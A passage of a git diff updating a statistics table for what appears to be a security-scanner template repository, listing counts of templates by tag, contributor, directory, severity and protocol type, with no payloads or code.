@yashanand155","count":3},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"ree4pwn","count":2},{"name":"joeldeleep","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"hetroublemakr","count":2},{"name":"hahwul","count":2},{"name":"bing0o","count":2},{"name":"lotusdll","count":2},{"name":"afaq","count":2},{"name":"lu4nx","count":2},{"name":"swissky","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"manas_harsh","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"bp0lr","count":2},{"name":"zomsop82","count":2},{"name":"foulenzer","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"moritz nentwig","count":2},{"name":"unstabl3","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"nkxxkn","count":2},{"name":"fabaff","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"koti2","count":2},{"name":"emenalf","count":2},{"name":"ehsahil","count":2},{"name":"jteles","count":1},{"name":"knassar702","count":1},{"name":"b4uh0lz","count":1},{"name":"yavolo","count":1},{"name":"akash.c","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"hanlaomo","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"gboddin","count":1},{"name":"j33n1k4","count":1},{"name":"0xteles","count":1},{"name":"mohammedsaneem","count":1},{"name":"kareemse1im","count":1},{"name":"rojanrijal","count":1},{"name":"mah3sec_","count":1},{"name":"alperenkesk","count":1},{"name":"bolli95","count":1},{"name":"_darrenmartyn","count":1},{"name":"luci","count":1},{"name":"vzamanillo","count":1},{"name":"ahmed sherif","count":1},{"name":"s1r1u5_","count":1},{"name":"ipanda","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"taielab","count":1},{"name":"0h1in9e","count":1},{"name":"tim_koopmans","count":1},{"name":"sicksec","count":1},{"name":"absshax","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kabirsuda","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"whynotke","count":1},{"name":"rodnt","count":1},{"name":"geraldino2","count":1},{"name":"c3l3si4n","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"rtcms","count":1},{"name":"d0rkerdevil","count":1},{"name":"co0nan","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"cookiehanhoan","count":1},{"name":"ldionmarcil","count":1},{"name":"abison_binoy","count":1},{"name":"andirrahmani1","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"sy3omda","count":1},{"name":"_c0wb0y_","count":1},{"name":"shelld3v","count":1},{"name":"omarkurt","count":1},{"name":"52971","count":1},{"name":"soyelmago","count":1},{"name":"r3naissance","count":1},{"name":"raesene","count":1},{"name":"undefl0w","count":1},{"name":"manuelbua","count":1},{"name":"chron0x","count":1},{"name":"udyz","count":1},{"name":"sickwell","count":1},{"name":"johnk3r","count":1},{"name":"hakluke","count":1},{"name":"bernardofsr","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"apt-mirror","count":1},{"name":"ilovebinbash","count":1},{"name":"ooooooo_q","count":1},{"name":"thezakman","count":1},{"name":"aresx","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"sshell","count":1},{"name":"@dwisiswant0","count":1},{"name":"notsoevilweasel","count":1},{"name":"retr0","count":1},{"name":"naglinagli","count":1},{"name":"divya_mudgal","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"sullo","count":1},{"name":"smaranchand","count":1},{"name":"idealphase","count":1},{"name":"makyotox","count":1},{"name":"ohlinge","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"mubassirpatel","count":1},{"name":"pdp","count":1},{"name":"defr0ggy","count":1},{"name":"0xrod","count":1},{"name":"ajaysenr","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"furkansenan","count":1},{"name":"schniggie","count":1},{"name":"huowuzhao","count":1},{"name":"johnjhacking","count":1},{"name":"thevillagehacker","count":1},{"name":"philippdelteil","count":1},{"name":"alph4byt3","count":1},{"name":"kurohost","count":1},{"name":"patralos","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"elder tao","count":1},{"name":"andysvints","count":1},{"name":"juicypotato1","count":1},{"name":"its0x08","count":1},{"name":"willd96","count":1},{"name":"deena","count":1},{"name":"mhdsamx","count":1},{"name":"regala_","count":1},{"name":"tirtha_mandal","count":1},{"name":"bad5ect0r","count":1},{"name":"pudsec","count":1},{"name":"qlkwej","count":1},{"name":"petruknisme","count":1},{"name":"gal nagli","count":1},{"name":"dawid czarnecki","count":1},{"name":"_harleo","count":1},{"name":"nytr0gen","count":1},{"name":"remonsec","count":1},{"name":"luskabol","count":1},{"name":"fopina","count":1},{"name":"zandros0","count":1},{"name":"me9187","count":1},{"name":"streetofhackerr007","count":1},{"name":"0ut0fb4nd","count":1},{"name":"un-fmunozs","count":1},{"name":"akshansh","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"ringo","count":1},{"name":"toufik airane","count":1},{"name":"berkdusunur","count":1},{"name":"b0yd","count":1},{"name":"elmahdi","count":1},{"name":"zhenwarx","count":1},{"name":"dogasantos","count":1},{"name":"shifacyclewla","count":1},{"name":"micha3lb3n","count":1},{"name":"arcc","count":1},{"name":"shreyapohekar","count":1},{"name":"0xtavian","count":1},{"name":"bjhulst","count":1},{"name":"flag007","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"daviey","count":1},{"name":"iampritam","count":1},{"name":"yashanand155","count":1},{"name":"revblock","count":1},{"name":"affix","count":1},{"name":"blckraven","count":1},{"name":"jeya seelan","count":1}],"directory":[{"name":"cves","count":554},{"name":"vulnerabilities","count":252},{"name":"exposed-panels","count":215},{"name":"exposures","count":170},{"name":"technologies","count":156},{"name":"misconfiguration","count":119},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":44},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":569},{"name":"high","count":441},{"name":"medium","count":371},{"name":"critical","count":210},{"name":"low","count":150}],"types":[{"name":"http","count":1646},{"name":"file","count":44},{"name":"network","count":35},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index f99c983619..881aaf64de 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,643 +1,684 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | -| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | -| tech | 78 | organiccrap | 24 | iot | 22 | | | | | -| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | -| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | -| | 66 | milo2012 | 14 | cnvd | 9 | | | | | -| token | 63 | philippedelteil | 14 | headless | 5 | | | | | -| apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 50 | techbrunchfr | 13 | | | | | | | -| iot | 43 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | cyllective | 11 | | | | | | | -| file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | righettod | 9 | | | | | | | +| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 | +| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 | +| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 | +| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 | +| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | | +| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | | +| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | | +| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | | +| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | | +| tech | 97 | gaurang | 42 | workflows | 34 | | | | | +| config | 90 | pussycat0x | 36 | miscellaneous | 27 | | | | | +| cve2021 | 88 | ice3man | 26 | network | 27 | | | | | +| cve2019 | 84 | organiccrap | 24 | iot | 23 | | | | | +| takeover | 72 | 0x_akoko | 20 | dns | 11 | | | | | +| cve2018 | 69 | philippedelteil | 16 | fuzzing | 10 | | | | | +| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | +| token | 64 | milo2012 | 14 | headless | 5 | | | | | +| apache | 62 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 51 | techbrunchfr | 13 | | | | | | | +| cve2017 | 45 | suman_kar | 12 | | | | | | | +| file | 44 | cyllective | 11 | | | | | | | +| iot | 44 | righettod | 10 | | | | | | | +| unauth | 42 | random_robbie | 10 | | | | | | | +| oob | 35 | hackergautam | 9 | | | | | | | | network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 34 | hackergautam | 8 | | | | | | | -| oob | 32 | nadino | 8 | | | | | | | -| logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | iamthefrogy | 8 | | | | | | | -| workflow | 29 | melbadry9 | 8 | | | | | | | -| ssrf | 27 | that_juan_ | 8 | | | | | | | -| misc | 27 | randomstr1ng | 7 | | | | | | | -| jira | 26 | dr_set | 7 | | | | | | | +| sqli | 34 | melbadry9 | 8 | | | | | | | +| oracle | 29 | that_juan_ | 8 | | | | | | | +| workflow | 29 | aashiq | 8 | | | | | | | +| logs | 29 | iamthefrogy | 8 | | | | | | | +| ssrf | 28 | r3dg33k | 8 | | | | | | | +| cve2016 | 27 | nadino | 8 | | | | | | | +| misc | 27 | harshbothra_ | 7 | | | | | | | +| jira | 26 | 0x240x23elu | 7 | | | | | | | | atlassian | 26 | emadshanab | 7 | | | | | | | -| disclosure | 25 | 0x240x23elu | 7 | | | | | | | -| cve2016 | 23 | oppsec | 7 | | | | | | | -| listing | 22 | harshbothra_ | 7 | | | | | | | -| redirect | 20 | techryptic (@tech) | 7 | | | | | | | -| aem | 19 | kophjager007 | 7 | | | | | | | -| cisco | 17 | r3dg33k | 7 | | | | | | | -| sap | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | caspergn | 6 | | | | | | | -| misconfig | 13 | __fazal | 6 | | | | | | | -| struts | 13 | yanyun | 5 | | | | | | | -| fuzz | 13 | joanbono | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| adobe | 12 | ganofins | 5 | | | | | | | -| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | -| weblogic | 12 | meme-lord | 4 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| dns | 11 | xelkomy | 4 | | | | | | | -| cve2012 | 11 | nodauf | 4 | | | | | | | -| zoho | 11 | elsfa7110 | 4 | | | | | | | -| springboot | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 11 | rootxharsh | 4 | | | | | | | -| cve2014 | 10 | e_schultze_ | 4 | | | | | | | -| devops | 10 | impramodsargar | 3 | | | | | | | -| jenkins | 10 | z3bd | 3 | | | | | | | +| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | +| listing | 24 | randomstr1ng | 7 | | | | | | | +| redirect | 21 | dr_set | 7 | | | | | | | +| aem | 19 | oppsec | 7 | | | | | | | +| cisco | 18 | kophjager007 | 7 | | | | | | | +| sap | 16 | __fazal | 6 | | | | | | | +| cve2015 | 16 | caspergn | 6 | | | | | | | +| debug | 14 | puzzlepeaches | 6 | | | | | | | +| cve2012 | 14 | iamnoooob | 5 | | | | | | | +| cve2014 | 13 | ganofins | 5 | | | | | | | +| auth-bypass | 13 | panch0r3d | 5 | | | | | | | +| struts | 13 | joanbono | 5 | | | | | | | +| android | 13 | yanyun | 5 | | | | | | | +| misconfig | 13 | pentest_swissky | 5 | | | | | | | +| fuzz | 13 | rootxharsh | 5 | | | | | | | +| adobe | 12 | xelkomy | 4 | | | | | | | +| jenkins | 12 | elsfa7110 | 4 | | | | | | | +| cve2011 | 12 | meme-lord | 4 | | | | | | | +| dns | 12 | github.com/its0x08 | 4 | | | | | | | +| weblogic | 12 | nodauf | 4 | | | | | | | +| devops | 11 | e_schultze_ | 4 | | | | | | | +| zoho | 11 | fyoorer | 3 | | | | | | | +| dlink | 11 | shifacyclewala | 3 | | | | | | | +| router | 11 | dudez | 3 | | | | | | | +| springboot | 11 | f1tz | 3 | | | | | | | | cve2013 | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | binaryfigments | 3 | | | | | | | -| dlink | 10 | tess | 3 | | | | | | | -| magento | 9 | dudez | 3 | | | | | | | -| gitlab | 8 | shine | 3 | | | | | | | -| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | -| rails | 8 | fyoorer | 3 | | | | | | | -| aws | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| cnvd | 8 | _generic_human_ | 3 | | | | | | | -| router | 8 | jarijaas | 3 | | | | | | | -| joomla | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | joeldeleep | 2 | | | | | | | -| xxe | 7 | 0xsapra | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| coldfusion | 6 | x1m_martijn | 2 | | | | | | | -| jetty | 6 | vavkamil | 2 | | | | | | | -| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| backup | 6 | fabaff | 2 | | | | | | | -| citrix | 6 | 0xrudra | 2 | | | | | | | -| api | 6 | 0xcrypto | 2 | | | | | | | -| cms | 6 | hetroublemakr | 2 | | | | | | | -| lucee | 5 | koti2 | 2 | | | | | | | -| java | 5 | 0xelkomy | 2 | | | | | | | -| dedecms | 5 | davidmckennirey | 2 | | | | | | | -| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 5 | bp0lr | 2 | | | | | | | -| django | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | nkxxkn | 2 | | | | | | | -| circarlife | 5 | bing0o | 2 | | | | | | | -| ibm | 5 | bsysop | 2 | | | | | | | -| ssti | 5 | ehsahil | 2 | | | | | | | -| confluence | 5 | gevakun | 2 | | | | | | | -| cve2009 | 5 | lotusdll | 2 | | | | | | | -| netgear | 5 | lu4nx | 2 | | | | | | | -| login | 5 | random-robbie | 2 | | | | | | | -| headless | 5 | randomrobbie | 2 | | | | | | | -| laravel | 5 | manas_harsh | 2 | | | | | | | -| solr | 5 | moritz nentwig | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| phpmyadmin | 5 | afaq | 2 | | | | | | | -| files | 5 | pxmme1337 | 2 | | | | | | | -| thinkphp | 4 | 0xprial | 2 | | | | | | | -| hongdian | 4 | emenalf | 2 | | | | | | | -| solarwinds | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | shifacyclewala | 2 | | | | | | | -| tomcat | 4 | w4cky_ | 2 | | | | | | | -| samsung | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | swissky | 2 | | | | | | | -| webserver | 4 | kiblyn11 | 2 | | | | | | | -| elastic | 4 | thevillagehacker | 1 | | | | | | | -| traversal | 4 | bernardo rodrigues | 1 | | | | | | | +| php | 10 | thomas_from_offensity | 3 | | | | | | | +| magento | 9 | vsh00t | 3 | | | | | | | +| ftp | 8 | impramodsargar | 3 | | | | | | | +| gitlab | 8 | z3bd | 3 | | | | | | | +| aws | 8 | shine | 3 | | | | | | | +| rails | 8 | jarijaas | 3 | | | | | | | +| airflow | 8 | 0w4ys | 3 | | | | | | | +| cnvd | 8 | binaryfigments | 3 | | | | | | | +| scada | 7 | tess | 3 | | | | | | | +| cve2009 | 7 | _generic_human_ | 3 | | | | | | | +| joomla | 7 | yash anand @yashanand155 | 3 | | | | | | | +| nginx | 7 | emenalf | 2 | | | | | | | +| xxe | 7 | random-robbie | 2 | | | | | | | +| vmware | 7 | lotusdll | 2 | | | | | | | +| login | 7 | hetroublemakr | 2 | | | | | | | +| coldfusion | 6 | unstabl3 | 2 | | | | | | | +| google | 6 | koti2 | 2 | | | | | | | +| jetty | 6 | bp0lr | 2 | | | | | | | +| cms | 6 | moritz nentwig | 2 | | | | | | | +| backup | 6 | vavkamil | 2 | | | | | | | +| citrix | 6 | manas_harsh | 2 | | | | | | | +| api | 6 | amsda | 2 | | | | | | | +| rconfig | 6 | nkxxkn | 2 | | | | | | | +| dell | 6 | dheerajmadhukar | 2 | | | | | | | +| drupal | 5 | pxmme1337 | 2 | | | | | | | +| phpmyadmin | 5 | udit_thakkur | 2 | | | | | | | +| dedecms | 5 | 0xprial | 2 | | | | | | | +| lucee | 5 | ehsahil | 2 | | | | | | | +| solr | 5 | incogbyte | 2 | | | | | | | +| files | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| ibm | 5 | lu4nx | 2 | | | | | | | +| django | 5 | w4cky_ | 2 | | | | | | | +| circarlife | 5 | hahwul | 2 | | | | | | | +| confluence | 5 | 0xsapra | 2 | | | | | | | +| netgear | 5 | bing0o | 2 | | | | | | | +| fileupload | 5 | davidmckennirey | 2 | | | | | | | +| ssti | 5 | ree4pwn | 2 | | | | | | | +| headless | 5 | swissky | 2 | | | | | | | +| iis | 5 | 0xrudra | 2 | | | | | | | +| laravel | 5 | gevakun | 2 | | | | | | | +| ruijie | 5 | randomrobbie | 2 | | | | | | | +| java | 5 | alifathi-h1 | 2 | | | | | | | +| webserver | 4 | 0xelkomy | 2 | | | | | | | +| docker | 4 | zomsop82 | 2 | | | | | | | +| thinkcmf | 4 | bsysop | 2 | | | | | | | +| deserialization | 4 | 0xcrypto | 2 | | | | | | | +| elastic | 4 | joeldeleep | 2 | | | | | | | +| nodejs | 4 | kiblyn11 | 2 | | | | | | | +| artifactory | 4 | afaq | 2 | | | | | | | +| vpn | 4 | fabaff | 2 | | | | | | | +| thinkphp | 4 | x1m_martijn | 2 | | | | | | | +| asp | 4 | foulenzer | 2 | | | | | | | +| tomcat | 4 | ooooooo_q | 1 | | | | | | | +| solarwinds | 4 | yashgoti | 1 | | | | | | | +| moodle | 4 | _darrenmartyn | 1 | | | | | | | +| jolokia | 4 | knassar702 | 1 | | | | | | | +| traversal | 4 | nytr0gen | 1 | | | | | | | +| samsung | 4 | toufik airane | 1 | | | | | | | +| crlf | 4 | kabirsuda | 1 | | | | | | | +| magmi | 4 | me9187 | 1 | | | | | | | +| hongdian | 4 | huowuzhao | 1 | | | | | | | +| nacos | 3 | th3.d1p4k | 1 | | | | | | | +| bitrix | 3 | bjhulst | 1 | | | | | | | +| oa | 3 | 0h1in9e | 1 | | | | | | | +| targa | 3 | d0rkerdevil | 1 | | | | | | | +| openssh | 3 | philippdelteil | 1 | | | | | | | +| tikiwiki | 3 | raesene | 1 | | | | | | | +| r-seenet | 3 | ohlinge | 1 | | | | | | | +| grafana | 3 | remonsec | 1 | | | | | | | +| terramaster | 3 | makyotox | 1 | | | | | | | +| windows | 3 | qlkwej | 1 | | | | | | | +| lfr | 3 | gal nagli | 1 | | | | | | | +| microstrategy | 3 | pdp | 1 | | | | | | | +| amazon | 3 | ringo | 1 | | | | | | | +| nosqli | 3 | johnk3r | 1 | | | | | | | +| ofbiz | 3 | kurohost | 1 | | | | | | | +| printer | 3 | jeya seelan | 1 | | | | | | | +| log | 3 | shifacyclewla | 1 | | | | | | | +| vbulletin | 3 | j33n1k4 | 1 | | | | | | | +| mongodb | 3 | notsoevilweasel | 1 | | | | | | | +| ebs | 3 | pudsec | 1 | | | | | | | +| hp | 3 | whynotke | 1 | | | | | | | +| cve2010 | 3 | ratnadip gajbhiye | 1 | | | | | | | +| kubernetes | 3 | naglinagli | 1 | | | | | | | +| git | 3 | akash.c | 1 | | | | | | | +| slack | 3 | blckraven | 1 | | | | | | | +| itop | 3 | alex | 1 | | | | | | | +| resin | 3 | luskabol | 1 | | | | | | | +| ssh | 3 | ahmed sherif | 1 | | | | | | | +| backups | 3 | @github.com/defr0ggy | 1 | | | | | | | +| zabbix | 3 | shreyapohekar | 1 | | | | | | | +| bypass | 3 | aceseven (digisec360) | 1 | | | | | | | +| kafka | 3 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| zhiyuan | 3 | thezakman | 1 | | | | | | | +| springcloud | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| fanruan | 3 | regala_ | 1 | | | | | | | +| fpd | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| caucho | 3 | thevillagehacker | 1 | | | | | | | +| prometheus | 2 | juicypotato1 | 1 | | | | | | | +| nextjs | 2 | jteles | 1 | | | | | | | +| sonarqube | 2 | rojanrijal | 1 | | | | | | | +| jsf | 2 | berkdusunur | 1 | | | | | | | +| openfire | 2 | 52971 | 1 | | | | | | | +| waf | 2 | gboddin | 1 | | | | | | | +| kibana | 2 | ldionmarcil | 1 | | | | | | | +| hpe | 2 | sshell | 1 | | | | | | | +| akamai | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| xxljob | 2 | johnjhacking | 1 | | | | | | | +| paloalto | 2 | idealphase | 1 | | | | | | | +| grav | 2 | s1r1u5_ | 1 | | | | | | | +| microsoft | 2 | cookiehanhoan | 1 | | | | | | | +| shellshock | 2 | udyz | 1 | | | | | | | +| sharepoint | 2 | rtcms | 1 | | | | | | | +| mail | 2 | elmahdi | 1 | | | | | | | +| seeyon | 2 | b4uh0lz | 1 | | | | | | | +| dos | 2 | taielab | 1 | | | | | | | +| idrac | 2 | yashanand155 | 1 | | | | | | | +| vrealize | 2 | zhenwarx | 1 | | | | | | | +| emerge | 2 | alph4byt3 | 1 | | | | | | | +| globalprotect | 2 | _harleo | 1 | | | | | | | +| linkerd | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| cve2008 | 2 | fopina | 1 | | | | | | | +| rockmongo | 2 | schniggie | 1 | | | | | | | +| voipmonitor | 2 | kareemse1im | 1 | | | | | | | +| icewarp | 2 | retr0 | 1 | | | | | | | +| keycloak | 2 | bad5ect0r | 1 | | | | | | | +| cache | 2 | flag007 | 1 | | | | | | | +| rstudio | 2 | noamrathaus | 1 | | | | | | | +| odoo | 2 | geraldino2 | 1 | | | | | | | +| yapi | 2 | andirrahmani1 | 1 | | | | | | | +| natshell | 2 | manuelbua | 1 | | | | | | | +| strapi | 2 | smaranchand | 1 | | | | | | | +| trixbox | 2 | arcc | 1 | | | | | | | +| jeedom | 2 | dawid czarnecki | 1 | | | | | | | +| leak | 2 | soyelmago | 1 | | | | | | | +| github | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| mida | 2 | mhdsamx | 1 | | | | | | | +| akkadian | 2 | rodnt | 1 | | | | | | | +| kevinlab | 2 | un-fmunozs | 1 | | | | | | | +| splunk | 2 | micha3lb3n | 1 | | | | | | | +| horde | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| chamilo | 2 | sickwell | 1 | | | | | | | +| kentico | 2 | apt-mirror | 1 | | | | | | | +| frp | 2 | vzamanillo | 1 | | | | | | | +| igs | 2 | @dwisiswant0 | 1 | | | | | | | +| openam | 2 | sullo | 1 | | | | | | | +| telerik | 2 | yavolo | 1 | | | | | | | +| smtp | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| vpn | 4 | sshell | 1 | | | | | | | -| artifactory | 4 | gal nagli | 1 | | | | | | | -| fileupload | 4 | mubassirpatel | 1 | | | | | | | -| nodejs | 4 | furkansenan | 1 | | | | | | | -| moodle | 4 | un-fmunozs | 1 | | | | | | | -| crlf | 4 | thezakman | 1 | | | | | | | -| asp | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| docker | 4 | j33n1k4 | 1 | | | | | | | -| thinkcmf | 4 | kareemse1im | 1 | | | | | | | -| grafana | 3 | divya_mudgal | 1 | | | | | | | -| springcloud | 3 | 0xrod | 1 | | | | | | | -| slack | 3 | naglinagli | 1 | | | | | | | -| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | -| nacos | 3 | _darrenmartyn | 1 | | | | | | | -| ofbiz | 3 | johnjhacking | 1 | | | | | | | -| windows | 3 | bad5ect0r | 1 | | | | | | | -| nosqli | 3 | regala_ | 1 | | | | | | | -| backups | 3 | geraldino2 | 1 | | | | | | | -| fpd | 3 | smaranchand | 1 | | | | | | | -| kubernetes | 3 | wabafet | 1 | | | | | | | -| hp | 3 | gboddin | 1 | | | | | | | -| ebs | 3 | makyotox | 1 | | | | | | | -| targa | 3 | chron0x | 1 | | | | | | | -| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| vbulletin | 3 | akash.c | 1 | | | | | | | -| oa | 3 | fmunozs | 1 | | | | | | | -| r-seenet | 3 | daviey | 1 | | | | | | | -| amazon | 3 | blckraven | 1 | | | | | | | -| resin | 3 | alex | 1 | | | | | | | -| caucho | 3 | knassar702 | 1 | | | | | | | -| cve2010 | 3 | remonsec | 1 | | | | | | | -| mongodb | 3 | noamrathaus | 1 | | | | | | | -| fanruan | 3 | soyelmago | 1 | | | | | | | -| deserialization | 3 | shreyapohekar | 1 | | | | | | | -| log | 3 | ohlinge | 1 | | | | | | | -| git | 3 | cookiehanhoan | 1 | | | | | | | -| openssh | 3 | retr0 | 1 | | | | | | | -| terramaster | 3 | 0xtavian | 1 | | | | | | | -| bypass | 3 | bolli95 | 1 | | | | | | | -| kafka | 3 | ldionmarcil | 1 | | | | | | | -| lfr | 3 | fopina | 1 | | | | | | | -| printer | 3 | jeya seelan | 1 | | | | | | | -| frp | 2 | nytr0gen | 1 | | | | | | | -| jboss | 2 | rtcms | 1 | | | | | | | -| ucmdb | 2 | elmahdi | 1 | | | | | | | -| webcam | 2 | defr0ggy | 1 | | | | | | | -| plesk | 2 | c3l3si4n | 1 | | | | | | | -| microsoft | 2 | vsh00t | 1 | | | | | | | -| proxy | 2 | exploitation | 1 | | | | | | | -| trixbox | 2 | andysvints | 1 | | | | | | | -| paloalto | 2 | 52971 | 1 | | | | | | | -| xxljob | 2 | mah3sec_ | 1 | | | | | | | -| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| smb | 2 | sickwell | 1 | | | | | | | -| linkerd | 2 | dawid czarnecki | 1 | | | | | | | -| natshell | 2 | affix | 1 | | | | | | | -| jellyfin | 2 | yashanand155 | 1 | | | | | | | -| globalprotect | 2 | mhdsamx | 1 | | | | | | | -| httpd | 2 | whynotke | 1 | | | | | | | -| hjtcloud | 2 | bjhulst | 1 | | | | | | | -| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | -| cache | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | undefl0w | 1 | | | | | | | -| vrealize | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| dos | 2 | ipanda | 1 | | | | | | | -| kibana | 2 | co0nan | 1 | | | | | | | -| mida | 2 | patralos | 1 | | | | | | | -| oauth | 2 | sicksec | 1 | | | | | | | -| fortios | 2 | hakluke | 1 | | | | | | | -| rstudio | 2 | luci | 1 | | | | | | | -| strapi | 2 | ahmed sherif | 1 | | | | | | | -| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | -| shellshock | 2 | rojanrijal | 1 | | | | | | | -| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | -| intrusive | 2 | alph4byt3 | 1 | | | | | | | -| kentico | 2 | b0yd | 1 | | | | | | | -| emerge | 2 | hanlaomo | 1 | | | | | | | -| kevinlab | 2 | revblock | 1 | | | | | | | -| hpe | 2 | sullo | 1 | | | | | | | -| mail | 2 | andirrahmani1 | 1 | | | | | | | -| ecology | 2 | sy3omda | 1 | | | | | | | -| yapi | 2 | kabirsuda | 1 | | | | | | | -| idrac | 2 | alifathi-h1 | 1 | | | | | | | -| splunk | 2 | idealphase | 1 | | | | | | | -| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | -| rockmongo | 2 | deena | 1 | | 